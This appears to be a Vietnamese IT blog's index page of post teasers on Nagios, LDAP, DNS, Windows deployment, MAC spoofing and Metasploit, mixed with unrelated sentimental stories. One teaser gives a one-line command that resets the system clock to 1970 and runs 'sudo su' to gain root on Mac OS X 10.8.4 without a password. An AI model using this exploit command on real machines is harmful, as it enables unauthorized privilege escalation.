Sử dụng Metasploit để khai thác lỗ hổng MS10-042 trên WindowsXP

Thông tin về lỗ hổng:

Bulletin ID	Tiêu đề	Mức độ cảnh báo	Ảnh hưởng	Yêu cầu khởi động lại	Phần mềm bị ảnh hưởng*
MS10-042	Lỗ hổng bảo mật trong “Help and Support Center” có thể cho phép thực hiện mã lệnh từ xa (2229593)	Nghiêm trọng	Thực hiện mã lệnh từ xa	Có thể yêu cầu khời động lại	Microsoft Windows XP và Windows Server 2003

Thông tin chi tiết:

Tản mạn 1

Bố bảo nhìn vào chiếc giường là biết cuộc sống vợ chồng có hạnh phúc hay không. Dù chuyện gì xảy ra đi chăng nữa, đừng mang chăn gối ra sofa ngủ, cũng đừng quay lưng vào người vợ của con, hãy ôm cô ấy vào bờ vai và khuôn ngực nóng hổi của con. Tất cả sẽ qua đi, chỉ tình yêu còn lại.

Giám sát các máy tính Windows bằng Nagios

Các bước thực hiện:

1.      Các điều kiện cần thiết

2.      Cài đặt plugin NSClient++ trên máy Windows từ xa

3.      Tạo ra host mới và định nghĩa dịch vụ dành cho máy Windows cần theo dõi

4.      Khởi động lại Nagios daemon

Câu Chuyện Giáo Dục Cảm Động

Câu chuyện đã xảy ra từ nhiều năm trước. Lúc đó, cô Thompson đang dạy ở trường tiểu học của một thị trấn nhỏ tại Hoa Kỳ. vào ngày khai giảng năm học mới, cô đứng trước những em học sinh lớp 5, nhìn cả lớp và nói cô sẽ yêu thương tất cả các học sinh như nhau. Nhưng thực ra cô biết mình sẽ không làm được điều đó bởi cô đã nhìn thấy cậu học sinh Teddy Stoddard ngồi lù lù ngay bàn đầu.

Mẹ là tất cả

Gia đình nghèo kia có 3 người: Bố – Mẹ – và Con trai. Họ sống âm thầm và bình lặng trong một thôn làng hẻo lánh, người Bố lo đi làm thuê để kiếm cơm gạo nuôi gia đình, người mẹ lo việc bếp núc, trồng mấy luống rau, và chăm sóc đứa con nhỏ – báu vật lớn nhất của gia đình.

Hướng dẫn cài đặt và cấu hình Nagios

Nagios là một phần mềm nguồn mở, Nagios cung cấp giám sát đầy đủ và cảnh báo cho các máy chủ, thiết bị chuyển mạch, các ứng dụng và dịch vụ.

Với Nagios ta có thể:

·         Kiểm tra toàn bộ cơ sở hạ tầng CNTT của bạn

·         Phát hiện vấn đề trước khi chúng xảy ra

·         Biết ngay khi có vấn đề phát sinh

·         Dữ liệu sẵn sàng chia sẻ với các bên liên quan

·         Phát hiện lỗ hổng bảo mật

·         Kế hoạch và ngân sách cho việc nâng cấp CNTT

·         Giảm thời gian chết và thiệt hại kinh doanh

Dò tìm dấu vết chỉnh sửa được thực hiện trên hệ thống Linux

Bạn muốn biết mọi lệnh do người dùng thực thi với thời gian sử dụng CPU và bộ nhớ, chương trình xử lý accounting sẽ cho phép ta làm được điều này. Nhờ chương trình này, người quản trị sẽ luôn tìm ra được mọi lệnh thực thi ở bất kỳ thời gian nào. Một số người khá thông minh, loại bỏ file history (như: ~/.bash_history) hòng tránh bị phát hiện. Nhưng bạn vẫn hoàn toàn có thể giám sát tất cả lệnh thực thi của người dùng bằng cách kiểm soát hoạt động người dùng sử dụng chương trình xử lý accounting.

Gói xử lý accounting gồm một số tiện ích giám sát các hoạt động chương trình như ac, lastcomm, accton và sa.

• Câu lệnh "ac" thể hiện lượng thời gian người dùng đăng nhập hệ thống.

• Câu lệnh "lastcomm" cho biết thông tin của các lệnh thực thi trước đó.

• Câu lệnh "accton" bật tắt chương trình xử lý accounting.

• Câu lệnh "sa" tóm tắt thông tin về các lệnh được thực thi trước đó.

Cấu hình Client để xác thực qua LDAP Server

Cài đặt OpenLDAP trên CentOS 6 xem bài:

http://nvkhoiit.blogspot.com/2013/10/cai-at-openldap-tren-centos-6.html

Cài đặt LAM và LDAP Admin xem bài:

http://nvkhoiit.blogspot.com/2013/10/cai-at-lam-va-ldap-admin.html

Cài đặt LAM và LDAP Admin.

Bài viết sẽ giúp chúng Cài đặt LAM (ldap account manager) trên CentOS và LDAP Admin trên Windows, đây là các gói phần mềm GUI (Graphical User Interface) giao diện đồ họa dùng để quản trị LDAP một cách dễ dàng.

Cài đặt OpenLDAP trên CentOS 6

Bài viết này sẽ giúp chúng ta cài đặt OpenLDAP trên CentOS6
Tài liệu và giới thiệu về OpenLDAP các bạn có thể xem tại:

http://www.openldap.org/doc/admin22/

Đăng nhập nhiều Account Yahoo trên một máy

Thủ thuật đăng nhập nhiều account trên một máy (áp dụng cho mọi phiên bản YM):

Tại một thời điểm, YM chỉ cho phép đăng nhập tối đa 1 tài khoản, có nghĩa là nếu sở hữu nhiều nickname, ta phải truy cập lần lượt từng tài khoản một. Để đăng nhập đồng thời nhiều Account trên máy ta làm như sau:

Cài đặt, cấu hình DNS trong LINUX

DNS là dịch vụ phân giải tên miền thành IP và ngược lại từ IP thành tên miền

Có 3 loại Name Server: Primary Name Server, Secondary Name Server, Caching Name Server

Cơ bản về Điện toán đám mây - Công nghệ của tương lai

Bài viết này sẽ giới thiệu cho chúng ta khái niệm điện toán đám mây và ứng dụng của nó.

Gần đây trên các loai phương tiện thông tin đại chúng và mạng internet, ta thường được nghe nói về 1 khái niệm rất là mới mẻ, đó là “Điện toán đám mây” (Cloud Computing). Nếu nghe qua cái tên thì chắc hẳn ai cũng nghĩ rằng đây là 1 phương pháp tính toán gì đó giống hình đám mây mà không hề biết Cloud Computing chính xác là gì. Vì thế, bài viết này xin được giới thiệu sơ qua về công nghệ điện toán đám mây đang phát triển cực kỳ mạnh mẽ hiện nay.

Nói lời vĩnh biệt với Trojan!

Mình có sưu tầm được 1 bài viết rất hay, tuy đã lâu nhưng kiến thức còn rất bổ ích, hi vọng bài viết sẽ giúp các bạn hiểu rõ hơn về Trojan!.

Trojan được Hackers "thả" vào máy hoặc hệ thống của nạn nhân, để thưc hiện các nhiệm vụ chủ yếu sau:

Fake IP

Fake IP là gì? Fake IP là việc truy cập vào các Website (các nguồn tài nguyên trên Web) gián tiếp thông qua một Proxy Server (Máy chủ Proxy).

Proxy Server là gì? Proxy server xác định những yêu cầu từ client và quyết định đáp ứng hay không đáp ứng, nếu yêu cầu được đáp ứng, proxy server sẽ kết nối với server thật thay cho client và tiếp tục chuyển tiếp những yêu cầu từ client đến server, cũng như đáp ứng những yêu cầu của server đến client. Vì vậy proxy server giống cầu nối trung gian giữa server và client . Cả hai Client và Server nghĩ rằng chúng nói chuyện trực tiếp với nhau nhưng thực sự chỉ "nói chuyện" thông qua Proxy.

Chiếm quyền root của máy Mac

Bạn đang ở user bình thường, giờ bạn muốn có quyền root mà không biết pass, bạn có thể dễ dàng chiếm quyền root của máy Mac (tương đương quyền Admininistrator của Windows) trên Mac OS X bản cập nhật mới nhất 10.8.4, chỉ bằng việc chỉnh thời gian hệ thống về 0 giờ ngày 01/01/1970.

Exploit command:

sudo -k;systemsetup -setusingnetworktime Off -settimezone GMT -setdate 01:01:1970 -settime 00:00;sudo su

Sưu tầm!.

Một số lệnh căn bản về Network trong Linux

Để xác định địa chỉ ip và các network interface ta dùng lệnh:

[root@localhost Desktop]# ifconfig –a

Cấu hình IP tĩnh trong Linux

Để cấu hình địa chỉ IP tĩnh trong Linux ta phải chỉnh sửa một số tập tin cấu hình network, tùy vào bản Linux mà chúng ta đang dùng, ta sẽ có cách chỉnh IP khác nhau.

- Đối với Fedora/RHEL/CentOS ta cấu hình trong file: /etc/sysconfig/network-scripts/ifcfg-xxx (trong đó xxx là tên interface)

- Đối với Debian/Ubuntu/LinuxMint ta cấu hình trong file: /etc/network/interfaces

DHCP là gì? Cơ chế hoạt động của DHCP?

Dynamic Host Configuration Protocol (DHCP - giao thức cấu hình động máy chủ) là một giao thức cấu hình tự động địa chỉ IP. Máy tính được cấu hình một cách tự động vì thế sẽ giảm việc can thiệp vào hệ thống mạng. Nó cung cấp một database trung tâm để theo dõi tất cả các máy tính trong hệ thống mạng. Mục đích quan trọng nhất là tránh trường hợp hai máy tính khác nhau lại có cùng địa chỉ IP.

Thiết lập nhiều Server chạy song song, triển khai hệ thống DFS

Bài viết gồm 3 phần:
1. Thiết lập 2 Domain Controler chạy song song
2. Triển khai, cấu hình hệ thống DFS (Distributed File System)
3. Giới thiệu về 5 chức năng Operation Master.
Các bạn download bài viết theo địa chỉ:
http://www.mediafire.com/download/dzh3liav434b8o3/Thiet_lap_nhieu_Domain_chay_song_song_Trien_khai_he_thong_DFS.pdf
Thanks!.

Cài đặt, nâng cấp Win2k8 lên Domain Controler

Các bạn download bài viết theo địa chỉ:
http://www.mediafire.com/download/oapdkagltrf252r/Cai_Dat_Nang_cap_Windows_Server_2008_len_Domain_Controler.pdf
Thanks!.

Đổi tên card mạng từ eth1 trở lại thành eth0 trong CenOS 6

Một ngày nào đó, ta mở máy lên và tự nhiên thấy card mạng eth0 của mình đâu mất, thay vào đó là card mạng đã thành eth1. Giờ ta muốn tên card mạng quay lại như lúc trước (từ eth1 trở lại thành eth0)

Win2k8 Network Access Protection (NAP) - DHCP

Download bài viết tại địa chỉ:
http://www.mediafire.com/?2941ylbwn63a147

Thanks!.

Hướng dẫn sử dụng Crontab trên Linux

1. Crontab là gì?

Cron là một tiện ích cho phép các tác vụ (tasks) tự động chạy nền trên hệ thống theo định kỳ bằng cách sử dụng các cron daemon. Crontab (CRON TABle) là một file chứa đựng trong nó các bảng biểu (schedule) cần chạy cũng như thời gian chạy của nó. Nó tương tự như Task Scheduler của Windows. Tất cả những gì chúng ta cần làm là gán các chương trình cần thực thi tới file crontab của hệ thống và sử dụng cấu trúc lệnh phù hợp, cron sẽ tự động thực hiện các ứng dụng đó vào thời điểm đã được thiết lập sẵn trước đó. Do vậy, tính năng này rất phù hợp trong quá trình tự động sao lưu dữ liệu, bảo dưỡng hệ thống... và các công việc tương tự khác.

Sử dụng Metasploit để khai thác lỗ hổng ms08_067 trên Windows XP SP3

      Mô hình sử dụng:

Bỏ chế độ Share ẩn ổ đĩa

Với Win 2k3, Xp thường khi cài đặt xong thì ổ đĩa C, D,… hay bị Share ẩn ( Share có dấu $ ).

Bạn muốn tắt đi vô Computer Mangement-->shared Folrder-->shares và Stop.

Nhưng khi Restart máy lại thì vẫn bị tình trang Share ẩn, để bỏ chế độ Share ẩn này ta làm như sau:

Crack Candy Crush Saga bằng Cheat Engine

Download Cheat Engine tại địa chỉ:

http://www.cheatengine.org/download.php

Khắc phục lỗi (0x2740) khi triển khai WDS

Cách cài đặt, triển khai WDS tham khảo tại:

http://nvkhoiit.blogspot.com/2013/07/windows-deployment-services-wds-phan-1.html

Khi triển khai Windows Deployment Services (WDS) Server, WDS không Start được. Ta có thể nhận được thông điệp sau trong System log:

Windows Deployment Services (WDS) phần 2

4.      Cấu hình Boot Image và Install Image

-    Mở Windows Deployment Services từ Administrative Tools, bung Server, bung WDS server (PCx.msopenlab.com), right click Boot Image, chọn Add Boot Image…

Windows Deployment Services (WDS) phần 1

WINDOWS DEPLOYMENT SERVICES (WDS)

I.       Mục đích 

Triển khai cài đặt hệ điều hành cho các máy trạm (client) đồng thời join các máy trạm vào Domain một cách tự động từ máy chủ (server) với một dịch vụ được tích hợp sẵn trên windows server 2008 là Windows Deployment Service (WDS).

Bài lab bao gồm các bước:

Reset Password Domain Administrator trên 2k8 R2 Enterprise

Làm thế nào khi ta bị quên Password Domain Administrator, bài viết này sẽ hướng dẫn cách Reset Password của Domain Administrator trên máy Domain Controller Windows Server 2008 R2 Enterprise bằng cách dùng chính đĩa cài đặt Windows Server 2008 R2 Enterprise.

Thông báo đăng nhập không thành công do bị sai Password.

Thay đổi địa chỉ MAC trong Windows, Linux và Mac OS

Khái niệm địa chỉ MAC xem tại:

http://nvkhoiit.blogspot.com/2013/07/khai-niem-ia-chi-mac-media-access.html

Một số người cho rằng địa chỉ MAC được gắn cứng với adapter mạng nên chúng ta không thể thay đổi nó. Tuy nhiên trong thực tế vẫn có cách để giả mạo địa chỉ MAC, về cơ bản là làm cho địa chỉ của adapter (card mạng) giống như một địa chỉ khác.

Mục đích của việc thay đổi địa chỉ MAC:

Khái niệm địa chỉ MAC (Media Access Control)

1. Khái niệm:

Trong mô hình OSI (Open Systems Interconnection) hay mô hình tham chiếu kết nối các hệ thống mở thì địa chỉ MAC (Media Access Control) nằm ở lớp 2 (lớp liên kết dữ liệu hay Data Link Layer). Nói một cách đơn giản, địa chỉ MAC là địa chỉ vật lý hay còn gọi là số nhận dạng (Identification number) của thiết bị. Mỗi thiết bị (card mạng, modem, router...) được nhà sản xuất chỉ định và gán sẵn 1 địa chỉ nhất định; thường được viết theo 2 dạng: MM:MM:MM:SS:SS:SS (cách nhau bởi dấu : ) hay MM-MM-MM-SS-SS-SS (cách nhau bởi dấu - ).

Giới thiệu về Blog.

Blog là nơi giao lưu, học hỏi, chia sẻ những kiến thức, kinh nghiệm về IT.
Cảm ơn các bạn đã ghé thăm!.